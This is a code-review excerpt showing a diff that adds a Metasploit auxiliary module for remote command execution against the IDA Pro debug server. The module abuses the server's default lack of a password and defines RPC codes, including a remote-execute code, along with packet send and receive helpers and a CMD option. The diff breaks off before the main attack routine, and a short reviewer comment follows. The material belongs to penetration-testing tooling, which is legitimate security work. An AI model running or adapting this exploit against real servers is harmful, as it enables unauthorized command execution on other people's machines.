modules/auxiliary/admin/idapro/idapro_dbgsrv_exec.rb

```diff
@@ -0,0 +1,101 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::Tcp
+
+  RPC_OK = 0
+  RPC_OPEN = 3
+  RPC_INIT = 10
+  RPC_REXEC = 43
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name' => 'IDA PRO Debug Server Remote Command Execution',
+                      'Description' => %q{
+By default the server component of IDA PRO debugger binds to all interfaces and has no password set.
+This can be abused for arbitrary command execution.
+BTW: even people explictily trying to set a password often get it wrong:
+server -Ppasswd  # password set
+server -P passwd  # oops, empty password!
+                      },
+                      'Author' => ['Patrick Harsdorf'],
+                      'License' => MSF_LICENSE,
+                      'References' =>
+                          [
+                          ],
+                      'DisclosureDate' => ''))
+
+    register_options(
+        [
+            Opt::RPORT(23946),
+            OptString.new('CMD', [false, 'The OS command to execute', '/usr/bin/touch pwned']),
+            OptString.new('PASSWORD', [false, 'password', '']),
+        ])
+  end
+
+  def receive_rpc_packet
+    length = sock.recv(4).unpack('N')[0].to_i
+    if datastore['VERBOSE']
+      print_status("packet length: #{length}")
+    end
+    rpc_code = sock.recv(1).ord
+    data = sock.recv(length)
+    if datastore['VERBOSE']
+      print_status("Received RPC code: #{rpc_code}, data: #{Rex::Text.hexify(data)}")
+    end
+    return rpc_code, data
+  end
+
+  def send_rpc_packet(rpc_code, data)
+    if datastore['VERBOSE']
+      print_status("Sending RPC code: #{rpc_code}, data: #{Rex::Text.hexify(data)}")
```

Comment:
@cbrnrd Thanks, that would be great. I won´t be at my dev machine for a few days anyway.